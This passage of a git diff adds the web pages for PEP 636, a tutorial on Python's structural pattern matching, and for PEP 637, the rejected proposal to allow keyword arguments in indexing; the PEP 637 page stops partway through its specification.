+ + + + + \ No newline at end of file diff --git a/pep-0636/index.html b/pep-0636/index.html new file mode 100644 index 00000000000..d8f2383b808 --- /dev/null +++ b/pep-0636/index.html @@ -0,0 +1,727 @@ + PEP 636 – Structural Pattern Matching: Tutorial | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 636 – Structural Pattern Matching: Tutorial

+
+
Author:
+
Daniel F Moisset <dfmoisset at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Resolution:
+
Python-Committers message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is a tutorial for the pattern matching introduced by PEP 634.

+

PEP 622 proposed syntax for pattern matching, which received detailed discussion +both from the community and the Steering Council. A frequent concern was +about how easy it would be to explain (and learn) this feature. This PEP +addresses that concern by providing the kind of document which developers could use +to learn about pattern matching in Python.

+

This is considered supporting material for PEP 634 (the technical specification +for pattern matching) and PEP 635 (the motivation and rationale for having pattern +matching and design considerations).

+

For readers who are looking more for a quick review than for a tutorial, +see Appendix A.

+
+
+

Tutorial

+

As an example to motivate this tutorial, you will be writing a text adventure. That is +a form of interactive fiction where the user enters text commands to interact with a +fictional world and receives text descriptions of what happens. Commands will be +simplified forms of natural language like get sword, attack dragon, go north, +enter shop or buy cheese.

+
+

Matching sequences

+

Your main loop will need to get input from the user and split it into words, let’s say +a list of strings like this:

+
command = input("What are you doing next? ")
+# analyze the result of command.split()
+
+
+

The next step is to interpret the words. Most of our commands will have two words: an +action and an object. So you may be tempted to do the following:

+
[action, obj] = command.split()
+... # interpret action, obj
+
+
+

The problem with that line of code is that it’s missing something: what if the user +types more or fewer than 2 words? To prevent this problem you can either check the length +of the list of words, or capture the ValueError that the statement above would raise.
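
+

For comparison, the two traditional approaches might look like this (an illustrative sketch that assumes command holds the input string):

+
words = command.split()
+if len(words) == 2:                # explicit length check
+    action, obj = words
+
+try:                               # or: catch the failed unpacking
+    action, obj = command.split()
+except ValueError:
+    pass                           # wrong number of words
+
+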

+

You can use a matching statement instead:

+
match command.split():
+    case [action, obj]:
+        ... # interpret action, obj
+
+
+

The match statement evaluates the “subject” (the value after the match +keyword), and checks it against the pattern (the code next to case). A pattern +is able to do two different things:

+
    +
  • Verify that the subject has certain structure. In your case, the [action, obj] +pattern matches any sequence of exactly two elements. This is called matching
  • +
  • It will bind some names in the pattern to component elements of your subject. In +this case, if the list has two elements, it will bind action = subject[0] and +obj = subject[1].
  • +
+

If there’s a match, the statements inside the case block will be executed with the +bound variables. If there’s no match, nothing happens and the statement after +match is executed next.

+

Note that, in a similar way to unpacking assignments, you can use either parentheses, +brackets, or just comma separation as synonyms. So you could write case action, obj +or case (action, obj) with the same meaning. All forms will match any sequence (for +example lists or tuples).

+
+
+

Matching multiple patterns

+

Even if most commands have the action/object form, you might want to have user commands +of different lengths. For example, you might want to add single verbs with no object like +look or quit. A match statement can (and is likely to) have more than one +case:

+
match command.split():
+    case [action]:
+        ... # interpret single-verb action
+    case [action, obj]:
+        ... # interpret action, obj
+
+
+

The match statement will check patterns from top to bottom. If the pattern doesn’t +match the subject, the next pattern will be tried. However, once the first +matching pattern is found, the body of that case is executed, and all further +cases are ignored. This is similar to the way that an if/elif/elif/... +statement works.

+
+
+

Matching specific values

+

Your code still needs to look at the specific actions and conditionally execute +different logic depending on the specific action (e.g., quit, attack, or buy). +You could do that using a chain of if/elif/elif/..., or using a dictionary of +functions, but here we’ll leverage pattern matching to solve that task. Instead of a +variable, you can use literal values in patterns (like "quit", 42, or None). +This allows you to write:

+
match command.split():
+    case ["quit"]:
+        print("Goodbye!")
+        quit_game()
+    case ["look"]:
+        current_room.describe()
+    case ["get", obj]:
+        character.get(obj, current_room)
+    case ["go", direction]:
+        current_room = current_room.neighbor(direction)
+    # The rest of your commands go here
+
+
+

A pattern like ["get", obj] will match only 2-element sequences that have a first +element equal to "get". It will also bind obj = subject[1].

+

As you can see in the go case, we also can use different variable names in +different patterns.

+

Literal values are compared with the == operator, except for the constants True, +False and None, which are compared with the is operator.
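
+

The difference can be observed with an object that claims equality with everything; the Anything class below is purely illustrative:

+
class Anything:
+    def __eq__(self, other):
+        return True        # compares equal to any value
+
+match Anything():
+    case None:             # identity check: fails, the subject is not None
+        print("matched None")
+    case 0:                # equality check: succeeds via __eq__
+        print("matched 0 by equality")
+
+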

+
+
+

Matching multiple values

+

A player may be able to drop multiple items by using a series of commands +drop key, drop sword, drop cheese. This interface might be cumbersome, and +you might like to allow dropping multiple items in a single command, like +drop key sword cheese. In this case you don’t know beforehand how many words will +be in the command, but you can use extended unpacking in patterns in the same way that +they are allowed in assignments:

+
match command.split():
+    case ["drop", *objects]:
+        for obj in objects:
+            character.drop(obj, current_room)
+    # The rest of your commands go here
+
+
+

This will match any sequence having “drop” as its first element. All remaining +elements will be captured in a list object which will be bound to the objects +variable.

+

This syntax has similar restrictions as sequence unpacking: you can not have more than one +starred name in a pattern.

+
+
+

Adding a wildcard

+

You may want to print an error message saying that the command wasn’t recognized when +all the patterns fail. You could use the feature we just learned and write +case [*ignored_words] as your last pattern. There’s however a much simpler way:

+
match command.split():
+    case ["quit"]: ... # Code omitted for brevity
+    case ["go", direction]: ...
+    case ["drop", *objects]: ...
+    ... # Other cases
+    case _:
+        print(f"Sorry, I couldn't understand {command!r}")
+
+
+

This special pattern which is written _ (and called wildcard) always +matches but it doesn’t bind any variables.

+

Note that this will match any object, not just sequences. As such, it only makes +sense to have it by itself as the last pattern (to prevent errors, Python will stop +you from using it before).
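
+

CPython reports this at compile time; one way to observe the error without crashing the surrounding script is to compile the offending code explicitly (an illustrative sketch):

+
snippet = """
+match command:
+    case _:
+        pass
+    case ["quit"]:         # unreachable: the wildcard above matches first
+        pass
+"""
+try:
+    compile(snippet, "<demo>", "exec")
+except SyntaxError as exc:
+    print(exc.msg)         # e.g. "wildcard makes remaining patterns unreachable"
+
+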

+
+
+

Composing patterns

+

This is a good moment to step back from the examples and understand how the patterns +that you have been using are built. Patterns can be nested within each other, and we +have been doing that implicitly in the examples above.

+

There are some “simple” patterns (“simple” here meaning that they do not contain other +patterns) that we’ve seen:

+
    +
  • Capture patterns (stand-alone names like direction, action, objects). We +never discussed these separately, but used them as part of other patterns.
  • +
  • Literal patterns (string literals, number literals, True, False, and +None)
  • +
  • The wildcard pattern _
  • +
+

Until now, the only non-simple pattern we have experimented with is the sequence pattern. +Each element in a sequence pattern can in fact be +any other pattern. This means that you could write a pattern like +["first", (left, right), _, *rest]. This will match subjects which are a sequence of at +least three elements, where the first one is equal to "first" and the second one is +in turn a sequence of two elements. It will also bind left=subject[1][0], +right=subject[1][1], and rest = subject[3:].
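
+

Those bindings are easy to verify with a quick, illustrative check:

+
match ["first", (1, 2), "x", "y", "z"]:
+    case ["first", (left, right), _, *rest]:
+        print(left, right, rest)   # 1 2 ['y', 'z']
+
+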

+
+
+

Or patterns

+

Going back to the adventure game example, you may find that you’d like to have several +patterns resulting in the same outcome. For example, you might want the commands +north and go north to be equivalent. You may also desire to have aliases for +get X, pick up X and pick X up for any X.

+

The | symbol in patterns combines them as alternatives. You could for example write:

+
match command.split():
+    ... # Other cases
+    case ["north"] | ["go", "north"]:
+        current_room = current_room.neighbor("north")
+    case ["get", obj] | ["pick", "up", obj] | ["pick", obj, "up"]:
+        ... # Code for picking up the given object
+
+
+

This is called an or pattern and will produce the expected result. Patterns are +tried from left to right; this may be relevant for knowing what is bound if more than +one alternative matches. An important restriction when writing or patterns is that all +alternatives should bind the same variables. So a pattern [1, x] | [2, y] is not +allowed because it would be unclear which variable would be bound after a successful +match. [1, x] | [2, x] is perfectly fine and will always bind x if successful.

+
+
+

Capturing matched sub-patterns

+

The first version of our “go” command was written with a ["go", direction] pattern. +The change we did in our last version using the pattern ["north"] | ["go", "north"] +has some benefits but also some drawbacks in comparison: the latest version allows the +alias, but also has the direction hardcoded, which will force us to actually have +separate patterns for north/south/east/west. This leads to some code duplication, but at +the same time we get better input validation, and we will not be getting into that +branch if the command entered by the user is "go figure!" instead of a direction.

+

We could try to get the best of both worlds doing the following (I’ll omit the aliased +version without “go” for brevity):

+
match command.split():
+    case ["go", ("north" | "south" | "east" | "west")]:
+        current_room = current_room.neighbor(...)
+        # how do I know which direction to go?
+
+
+

This code is a single branch, and it verifies that the word after “go” is really a +direction. But the code moving the player around needs to know which one was chosen and +has no way to do so. What we need is a pattern that behaves like the or pattern but at +the same time does a capture. We can do so with an as pattern:

+
match command.split():
+    case ["go", ("north" | "south" | "east" | "west") as direction]:
+        current_room = current_room.neighbor(direction)
+
+
+

The as-pattern matches whatever pattern is on its left-hand side, but also binds the +value to a name.

+
+
+

Adding conditions to patterns

+

The patterns we have explored above can do some powerful data filtering, but sometimes +you may wish for the full power of a boolean expression. Let’s say that you would actually +like to allow a “go” command only in a restricted set of directions based on the possible +exits from the current_room. We can achieve that by adding a guard to our +case. Guards consist of the if keyword followed by any expression:

+
match command.split():
+    case ["go", direction] if direction in current_room.exits:
+        current_room = current_room.neighbor(direction)
+    case ["go", _]:
+        print("Sorry, you can't go that way")
+
+
+

The guard is not part of the pattern, it’s part of the case. It’s only checked if +the pattern matches, and after all the pattern variables have been bound (that’s why the +condition can use the direction variable in the example above). If the pattern +matches and the condition is truthy, the body of the case executes normally. If the +pattern matches but the condition is falsy, the match statement proceeds to check the +next case as if the pattern hadn’t matched (with the possible side-effect of +having already bound some variables).
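
+

That side-effect is observable: in this sketch the first guard fails, yet a and b stay bound when the next case runs:

+
match [1, 2]:
+    case [a, b] if a > b:
+        print("descending")
+    case _:
+        print("bound anyway:", a, b)   # bound anyway: 1 2
+
+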

+
+
+

Adding a UI: Matching objects

+

Your adventure is becoming a success and you have been asked to implement a graphical +interface. Your UI toolkit of choice allows you to write an event loop where you can get a new +event object by calling event.get(). The resulting object can have different type and +attributes according to the user action, for example:

+
    +
  • A KeyPress object is generated when the user presses a key. It has a key_name +attribute with the name of the key pressed, and some other attributes regarding modifiers.
  • +
  • A Click object is generated when the user clicks the mouse. It has an attribute +position with the coordinates of the pointer.
  • +
  • A Quit object is generated when the user clicks on the close button for the game +window.
  • +
+

Rather than writing multiple isinstance() checks, you can use patterns to recognize +different kinds of objects, and also apply patterns to their attributes:

+
match event.get():
+    case Click(position=(x, y)):
+        handle_click_at(x, y)
+    case KeyPress(key_name="Q") | Quit():
+        game.quit()
+    case KeyPress(key_name="up arrow"):
+        game.go_north()
+    ...
+    case KeyPress():
+        pass # Ignore other keystrokes
+    case other_event:
+        raise ValueError(f"Unrecognized event: {other_event}")
+
+
+

A pattern like Click(position=(x, y)) only matches if the type of the event is +a subclass of the Click class. It will also require that the event has a position +attribute that matches the (x, y) pattern. If there’s a match, the locals x and +y will get the expected values.

+

A pattern like KeyPress(), with no arguments, will match any object which is an +instance of the KeyPress class. Only the attributes you specify in the pattern are +matched, and any other attributes are ignored.

+
+
+

Matching positional attributes

+

The previous section described how to match named attributes when doing an object match. +For some objects it could be convenient to describe the matched arguments by position +(especially if there are only a few attributes and they have a “standard” ordering). +If the classes that you are using are named tuples or dataclasses, you can do that by +following the same order that you’d use when constructing an object. For example, if +the UI framework above defines their class like this:

+
from dataclasses import dataclass
+
+@dataclass
+class Click:
+    position: tuple
+    button: Button
+
+
+

then you can rewrite your match statement above as:

+
match event.get():
+    case Click((x, y)):
+        handle_click_at(x, y)
+
+
+

The (x, y) pattern will be automatically matched against the position +attribute, because the first argument in the pattern corresponds to the first +attribute in your dataclass definition.

+

Other classes don’t have a natural ordering of their attributes so you’re required to +use explicit names in your pattern to match with their attributes. However, it’s possible +to manually specify the ordering of the attributes allowing positional matching, like in +this alternative definition:

+
class Click:
+    __match_args__ = ("position", "button")
+    def __init__(self, pos, btn):
+        self.position = pos
+        self.button = btn
+        ...
+
+
+

The __match_args__ special attribute defines an explicit order for your attributes +that can be used in patterns like case Click((x,y)).

+
+
+

Matching against constants and enums

+

Your pattern above treats all mouse buttons the same, and you have decided that you +want to accept left-clicks, and ignore other buttons. While doing so, you notice that +the button attribute is typed as a Button which is an enumeration built with +enum.Enum. You can in fact match against enumeration values like this:

+
match event.get():
+    case Click((x, y), button=Button.LEFT):  # This is a left click
+        handle_click_at(x, y)
+    case Click():
+        pass  # ignore other clicks
+
+
+

This will work with any dotted name (like math.pi). However an unqualified name (i.e. +a bare name with no dots) will be always interpreted as a capture pattern, so avoid +that ambiguity by always using qualified constants in patterns.

+
+
+

Going to the cloud: Mappings

+

You have decided to make an online version of your game. All +of your logic will be in a server, and the UI in a client which will communicate using +JSON messages. Via the json module, those will be mapped to Python dictionaries, +lists and other builtin objects.

+

Our client will receive a list of dictionaries (parsed from JSON) of actions to take, +each element looking for example like these:

+
    +
  • {"text": "The shop keeper says 'Ah! We have Camembert, yes sir'", "color": "blue"}
  • +
  • If the client should make a pause {"sleep": 3}
  • +
  • To play a sound {"sound": "filename.ogg", "format": "ogg"}
  • +
+

Until now, our patterns have processed sequences, but there are patterns to match +mappings based on their present keys. In this case you could use:

+
for action in actions:
+    match action:
+        case {"text": message, "color": c}:
+            ui.set_text_color(c)
+            ui.display(message)
+        case {"sleep": duration}:
+            ui.wait(duration)
+        case {"sound": url, "format": "ogg"}:
+            ui.play(url)
+        case {"sound": _, "format": _}:
+            warning("Unsupported audio format")
+
+
+

The keys in your mapping pattern need to be literals, but the values can be any +pattern. As in sequence patterns, all subpatterns have to match for the general +pattern to match.

+

You can use **rest within a mapping pattern to capture additional keys in +the subject. Note that if you omit this, extra keys in the subject will be +ignored while matching, i.e. the message +{"text": "foo", "color": "red", "style": "bold"} will match the first pattern +in the example above.
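
+

A short sketch of **rest (illustrative, not part of the original tutorial):

+
message = {"text": "foo", "color": "red", "style": "bold"}
+match message:
+    case {"text": text, **rest}:
+        print(text, rest)   # foo {'color': 'red', 'style': 'bold'}
+
+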

+
+
+

Matching builtin classes

+

The code above could use some validation. Given that messages came from an external +source, the types of the field could be wrong, leading to bugs or security issues.

+

Any class is a valid match target, and that includes built-in classes like bool, +str or int. That allows us to combine the code above with a class pattern. +So instead of writing {"text": message, "color": c} we can use +{"text": str() as message, "color": str() as c} to ensure that message and c +are both strings. For many builtin classes (see PEP 634 for the whole list), you can +use a positional parameter as a shorthand, writing str(c) rather than str() as c. +The fully rewritten version looks like this:

+
for action in actions:
+    match action:
+        case {"text": str(message), "color": str(c)}:
+            ui.set_text_color(c)
+            ui.display(message)
+        case {"sleep": float(duration)}:
+            ui.wait(duration)
+        case {"sound": str(url), "format": "ogg"}:
+            ui.play(url)
+        case {"sound": _, "format": _}:
+            warning("Unsupported audio format")
+
+
+
+
+
+

Appendix A – Quick Intro

+

A match statement takes an expression and compares its value to successive +patterns given as one or more case blocks. This is superficially +similar to a switch statement in C, Java or JavaScript (and many +other languages), but much more powerful.

+

The simplest form compares a subject value against one or more literals:

+
def http_error(status):
+    match status:
+        case 400:
+            return "Bad request"
+        case 404:
+            return "Not found"
+        case 418:
+            return "I'm a teapot"
+        case _:
+            return "Something's wrong with the Internet"
+
+
+

Note the last block: the “variable name” _ acts as a wildcard and +never fails to match.

+

You can combine several literals in a single pattern using | (“or”):

+
case 401 | 403 | 404:
+    return "Not allowed"
+
+
+

Patterns can look like unpacking assignments, and can be used to bind +variables:

+
# point is an (x, y) tuple
+match point:
+    case (0, 0):
+        print("Origin")
+    case (0, y):
+        print(f"Y={y}")
+    case (x, 0):
+        print(f"X={x}")
+    case (x, y):
+        print(f"X={x}, Y={y}")
+    case _:
+        raise ValueError("Not a point")
+
+
+

Study that one carefully! The first pattern has two literals, and can +be thought of as an extension of the literal pattern shown above. But +the next two patterns combine a literal and a variable, and the +variable binds a value from the subject (point). The fourth +pattern captures two values, which makes it conceptually similar to +the unpacking assignment (x, y) = point.

+

If you are using classes to structure your data +you can use the class name followed by an argument list resembling a +constructor, but with the ability to capture attributes into variables:

+
from dataclasses import dataclass
+
+@dataclass
+class Point:
+    x: int
+    y: int
+
+def where_is(point):
+    match point:
+        case Point(x=0, y=0):
+            print("Origin")
+        case Point(x=0, y=y):
+            print(f"Y={y}")
+        case Point(x=x, y=0):
+            print(f"X={x}")
+        case Point():
+            print("Somewhere else")
+        case _:
+            print("Not a point")
+
+
+

You can use positional parameters with some builtin classes that provide an +ordering for their attributes (e.g. dataclasses). You can also define a specific +position for attributes in patterns by setting the __match_args__ special +attribute in your classes. If it’s set to ("x", "y"), the following patterns are all +equivalent (and all bind the y attribute to the var variable):

+
Point(1, var)
+Point(1, y=var)
+Point(x=1, y=var)
+Point(y=var, x=1)
+
+
+

Patterns can be arbitrarily nested. For example, if we have a short +list of points, we could match it like this:

+
match points:
+    case []:
+        print("No points")
+    case [Point(0, 0)]:
+        print("The origin")
+    case [Point(x, y)]:
+        print(f"Single point {x}, {y}")
+    case [Point(0, y1), Point(0, y2)]:
+        print(f"Two on the Y axis at {y1}, {y2}")
+    case _:
+        print("Something else")
+
+
+

We can add an if clause to a pattern, known as a “guard”. If the +guard is false, match goes on to try the next case block. Note +that value capture happens before the guard is evaluated:

+
match point:
+    case Point(x, y) if x == y:
+        print(f"Y=X at {x}")
+    case Point(x, y):
+        print(f"Not on the diagonal")
+
+
+

Several other key features:

+
    +
  • Like unpacking assignments, tuple and list patterns have exactly the +same meaning and actually match arbitrary sequences. An important +exception is that they don’t match iterators or strings. +(Technically, the subject must be an instance of +collections.abc.Sequence.)
  • +
  • Sequence patterns support wildcards: [x, y, *rest] and (x, y, +*rest) work similar to wildcards in unpacking assignments. The +name after * may also be _, so (x, y, *_) matches a sequence +of at least two items without binding the remaining items.
  • +
  • Mapping patterns: {"bandwidth": b, "latency": l} captures the +"bandwidth" and "latency" values from a dict. Unlike sequence +patterns, extra keys are ignored. A wildcard **rest is also +supported. (But **_ would be redundant, so it is not allowed.)
  • +
  • Subpatterns may be captured using the as keyword:
    case (Point(x1, y1), Point(x2, y2) as p2): ...
    +
    +
    +
  • +
  • Most literals are compared by equality, however the singletons True, +False and None are compared by identity.
  • +
  • Patterns may use named constants. These must be dotted names +to prevent them from being interpreted as capture variables:
    from enum import Enum
    +class Color(Enum):
    +    RED = 0
    +    GREEN = 1
    +    BLUE = 2
    +
    +match color:
    +    case Color.RED:
    +        print("I see red!")
    +    case Color.GREEN:
    +        print("Grass is green")
    +    case Color.BLUE:
    +        print("I'm feeling the blues :(")
    +
    +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0636.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0637/index.html b/pep-0637/index.html new file mode 100644 index 00000000000..be4f3d33744 --- /dev/null +++ b/pep-0637/index.html @@ -0,0 +1,1216 @@ + PEP 637 – Support for indexing with keyword arguments | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 637 – Support for indexing with keyword arguments

+
+
Author:
+
Stefano Borini
+
Sponsor:
+
Steven D’Aprano
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2020
+
Python-Version:
+
3.10
+
Post-History:
+
23-Sep-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been rejected. In general, the cost of introducing new syntax +was not outweighed by the perceived benefits. See the link in the Resolution +header field for details.

+
+
+

Abstract

+

At present keyword arguments are allowed in function calls, but not in +item access. This PEP proposes that Python be extended to allow keyword +arguments in item access.

+

The following example shows keyword arguments for ordinary function calls:

+
>>> val = f(1, 2, a=3, b=4)
+
+
+

The proposal would extend the syntax to allow a similar construct +to indexing operations:

+
>>> val = x[1, 2, a=3, b=4]  # getitem
+>>> x[1, 2, a=3, b=4] = val  # setitem
+>>> del x[1, 2, a=3, b=4]    # delitem
+
+
+

and would also provide appropriate semantics. Single- and double-star unpacking of +arguments is also provided:

+
>>> val = x[*(1, 2), **{'a': 3, 'b': 4}]  # Equivalent to above.
+
+
+

This PEP is a successor to PEP 472, which was rejected due to lack of +interest in 2019. Since then there’s been renewed interest in the feature.

+
+
+

Overview

+
+

Background

+

PEP 472 was opened in 2014. The PEP detailed various use cases and was created by +extracting implementation strategies from a broad discussion on the +python-ideas mailing list, although no clear consensus was reached on which strategy +should be used. Many corner cases have been examined more closely and felt +awkward, backward incompatible or both.

+

The PEP was eventually rejected in 2019 [1] mostly +due to lack of interest for the feature despite its 5 years of existence.

+

However, with the introduction of type hints in PEP 484 the +square bracket notation has been used consistently to enrich the typing +annotations, e.g. to specify a list of integers as Sequence[int]. Additionally, +there has been rapid growth of packages for data analysis such as pandas +and xarray, which use names to describe columns in a table (pandas) or axes in +an nd-array (xarray). These packages allow users to access specific data by +names, but cannot currently use index notation ([]) for this functionality.

+

As a result, a renewed interest in a more flexible syntax that would allow for +named information has been expressed occasionally in many different threads on +python-ideas, recently by Caleb Donovick [2] in 2019 and Andras +Tantos [3] in 2020. These requests prompted strong activity on the +python-ideas mailing list, where the various options have been re-discussed and +a general consensus on an implementation strategy has now been reached.

+
+
+

Use cases

+

The following practical use cases present different cases where a keyword +specification would improve notation and provide additional value:

+
    +
  1. To provide a more communicative meaning to the index, preventing e.g. accidental +inversion of indexes:
    >>> grid_position[x=3, y=5, z=8]
    +>>> rain_amount[time=0:12, location=location]
    +>>> matrix[row=20, col=40]
    +
    +
    +
  2. +
  3. To enrich the typing notation with keywords, especially during the use of generics:
    def function(value: MyType[T=int]):
    +
    +
    +
  4. +
  5. In some domains, such as computational physics and chemistry, the use of a +notation such as Basis[Z=5] is a Domain Specific Language notation to represent +a level of accuracy:
    >>> low_accuracy_energy = computeEnergy(molecule, BasisSet[Z=3])
    +
    +
    +
  6. +
  7. Pandas currently uses a notation such as:
    >>> df[df['x'] == 1]
    +
    +
    +

    which could be replaced with df[x=1].

    +
  8. +
  9. xarray has named dimensions. Currently these are handled with functions like .isel:
    >>> data.isel(row=10)  # Returns the tenth row
    +
    +
    +

    which could also be replaced with data[row=10]. A more complex example:

    +
    >>> # old syntax
    +>>> da.isel(space=0, time=slice(None, 2))[...] = spam
    +>>> # new syntax
    +>>> da[space=0, time=:2] = spam
    +
    +
    +

    Another example:

    +
    >>> # old syntax
    +>>> ds["empty"].loc[dict(lon=5, lat=6)] = 10
    +>>> # new syntax
    +>>> ds["empty"][lon=5, lat=6] = 10
    +
    +>>> # old syntax
    +>>> ds["empty"].loc[dict(lon=slice(1, 5), lat=slice(3, None))] = 10
    +>>> # new syntax
    +>>> ds["empty"][lon=1:5, lat=6:] = 10
    +
    +
    +
  10. +
  11. Functions/methods whose argument is another function (plus its +arguments) need some way to determine which arguments are destined for +the target function, and which are used to configure how they run the +target. This is simple (if non-extensible) for positional parameters, +but we need some way to distinguish these for keywords. [4]

    An indexed notation would afford a Pythonic way to pass keyword +arguments to these functions without cluttering the caller’s code.

    +
    >>> # Let's start this example with basic syntax without keywords.
    +>>> # the positional values are arguments to `func` while
    +>>> # `name=` is processed by `trio.run`.
    +>>> trio.run(func, value1, value2, name="func")
    +>>> # `trio.run` ends up calling `func(value1, value2)`.
    +
    +>>> # If we want/need to pass value2 by keyword (keyword-only argument,
    +>>> # additional arguments that won't break backwards compatibility ...),
    +>>> # currently we need to resort to functools.partial:
    +>>> trio.run(functools.partial(func, param2=value2), value1, name="func")
    +>>> trio.run(functools.partial(func, value1, param2=value2), name="func")
    +
    +>>> # One possible workaround is to convert `trio.run` to an object
    +>>> # with a `__call__` method, and use an "option" helper,
    +>>> trio.run.option(name="func")(func, value1, param2=value2)
    +>>> # However, foo(bar)(baz) is uncommon and thus disruptive to the reader.
    +>>> # Also, you need to remember the name of the `option` method.
    +
    +>>> # This PEP allows us to replace `option` with `__getitem__`.
    +>>> # The call is now shorter, more mnemonic, and looks+works like typing
    +>>> trio.run[name="func"](func, value1, param2=value2)
    +
    +
    +
  12. +
  13. Availability of star arguments would benefit PEP 646 Variadic Generics, +especially in the forms a[*x] and a[*x, *y, p, q, *z]. The PEP details +exactly this notation in its “Unpacking: Star Operator” section.
  14. +
+

It is important to note that how the notation is interpreted is up to the +implementation. This PEP only defines and dictates the behavior of Python +regarding passed keyword arguments, not how these arguments should be +interpreted and used by the implementing class.

+
+
+

Current status of indexing operation

+

Before detailing the new syntax and semantics to the indexing notation, it is +relevant to analyse how the indexing notation works today, in which contexts, +and how it is different from a function call.

+

Subscripting obj[x] is, effectively, an alternate and specialised form of +function call syntax with a number of differences and restrictions compared to +obj(x). The current Python syntax focuses exclusively on position to express +the index, and also contains syntactic sugar to refer to non-punctiform +selection (slices). Some common examples:

+
>>> a[3]       # returns the fourth element of 'a'
+>>> a[1:10:2]  # slice notation (extract a non-trivial data subset)
+>>> a[3, 2]    # multiple indexes (for multidimensional arrays)
+
+
+

This translates into a __(get|set|del)item__ dunder call which is passed a single +parameter containing the index (for __getitem__ and __delitem__) or two parameters +containing index and value (for __setitem__).

+

The behavior of the indexing call is fundamentally different from a function call +in various aspects:

+

The first difference is in meaning to the reader. A function call says +“arbitrary function call potentially with side-effects”. An indexing operation +says “lookup”, typically to point at a subset or specific sub-aspect of an +entity (as in the case of typing notation). This fundamental difference means +that, while we cannot prevent abuse, implementors should be aware that the +introduction of keyword arguments to alter the behavior of the lookup may +violate this intrinsic meaning.

+

The second difference of the indexing notation compared to a function +is that indexing can be used for both getting and setting operations. +In Python, a function cannot be on the left hand side of an assignment. In +other words, both of these are valid:

+
>>> x = a[1, 2]
+>>> a[1, 2] = 5
+
+
+

but only the first one of these is valid:

+
>>> x = f(1, 2)
+>>> f(1, 2) = 5  # invalid
+
+
+

This asymmetry is important, and makes one understand that there is a natural +imbalance between the two forms. It is therefore not a given that the two +should behave transparently and symmetrically.

+

The third difference is that functions have names assigned to their +arguments, unless the passed parameters are captured with *args, in which case +they end up as entries in the args tuple. In other words, functions already +have anonymous argument semantics, exactly like the indexing operation. However, +__(get|set|del)item__ does not always receive a tuple as the index argument +(to be uniform in behavior with *args). In fact, given a trivial class:

+
class X:
+    def __getitem__(self, index):
+        print(index)
+
+
+

The index operation basically forwards the content of the square brackets “as is” +in the index argument:

+
>>> x=X()
+>>> x[0]
+0
+>>> x[0, 1]
+(0, 1)
+>>> x[(0, 1)]
+(0, 1)
+>>>
+>>> x[()]
+()
+>>> x[{1, 2, 3}]
+{1, 2, 3}
+>>> x["hello"]
+hello
+>>> x["hello", "hi"]
+('hello', 'hi')
+
+
+

The fourth difference is that the indexing operation knows how to convert +colon notations to slices, thanks to support from the parser. This is valid:

+
a[1:3]
+
+
+

this one isn’t:

+
f(1:3)
+
+
+

The fifth difference is that there’s no zero-argument form. This is valid:

+
f()
+
+
+

this one isn’t:

+
a[]
+
+
+
+
+
+

Specification

+

Before describing the specification, it is important to stress the difference in +nomenclature between positional index, final index and keyword argument, as it is important to +understand the fundamental asymmetries at play. The __(get|set|del)item__ +is fundamentally an indexing operation, and the way the element is retrieved, +set, or deleted is through an index, the final index.

+

The current status quo is to directly build the final index from what is passed between +square brackets, the positional index. In other words, what is passed in the +square brackets is trivially used to generate what the code in __getitem__ then uses +for the indexing operation. As we already saw for the dict, d[1] has a +positional index of 1 and also a final index of 1 (because it’s the element that is +then added to the dictionary) and d[1, 2] has a positional index of (1, 2) and +a final index also of (1, 2) (because yet again it’s the element that is added to the dictionary). +However, the positional index d[1,2:3] is not accepted by the dictionary, because +there’s no way to transform the positional index into a final index, as the slice object is +unhashable. The positional index is what is currently known as the index parameter in +__getitem__. Nevertheless, nothing prevents constructing a dictionary-like class that +creates the final index by e.g. converting the positional index to a string.
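
+

As a sketch of that last point, the StrKeyDict class below is hypothetical and exists only for illustration:

+
class StrKeyDict(dict):
+    # The final index is the string form of whatever positional index arrives.
+    def __setitem__(self, index, value):
+        super().__setitem__(str(index), value)
+    def __getitem__(self, index):
+        return super().__getitem__(str(index))
+
+d = StrKeyDict()
+d[1, 2:3] = "spam"    # positional index (1, slice(2, 3, None)) is unhashable...
+print(d[1, 2:3])      # ...but its string form is a usable final index: spam
+
+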

+

This PEP extends the current status quo, and grants more flexibility to +create the final index via an enhanced syntax that combines the positional index +and keyword arguments, if passed.

+

The above brings an important point across. Keyword arguments, in the context of the index +operation, may be used to make indexing decisions to obtain the final index, and therefore +will have to accept values that are unconventional for functions. See for +example use case 1, where a slice is accepted.

+

The successful implementation of this PEP will result in the following behavior:

+
    +
  1. An empty subscript is still illegal, regardless of context (see Rejected Ideas):
    obj[]  # SyntaxError
    +
    +
    +
  2. +
  3. A single index value remains a single index value when passed:
    obj[index]
    +# calls type(obj).__getitem__(obj, index)
    +
    +obj[index] = value
    +# calls type(obj).__setitem__(obj, index, value)
    +
    +del obj[index]
    +# calls type(obj).__delitem__(obj, index)
    +
    +
    +

    This remains the case even if the index is followed by keywords; see point 5 below.

    +
  4. +
  5. Comma-separated arguments are still parsed as a tuple and passed as +a single positional argument:
    obj[spam, eggs]
    +# calls type(obj).__getitem__(obj, (spam, eggs))
    +
    +obj[spam, eggs] = value
    +# calls type(obj).__setitem__(obj, (spam, eggs), value)
    +
    +del obj[spam, eggs]
    +# calls type(obj).__delitem__(obj, (spam, eggs))
    +
    +
    +

    The points above mean that classes which do not want to support keyword +arguments in subscripts need do nothing at all, and the feature is therefore +completely backwards compatible.

    +
  6. +
  7. Keyword arguments, if any, must follow positional arguments:
    obj[1, 2, spam=None, 3]  # SyntaxError
    +
    +
    +

    This is like function calls, where intermixing positional and keyword +arguments gives a SyntaxError.

    +
  8. +
  9. Keyword subscripts, if any, will be handled like they are in +function calls. Examples:
    # Single index with keywords:
    +
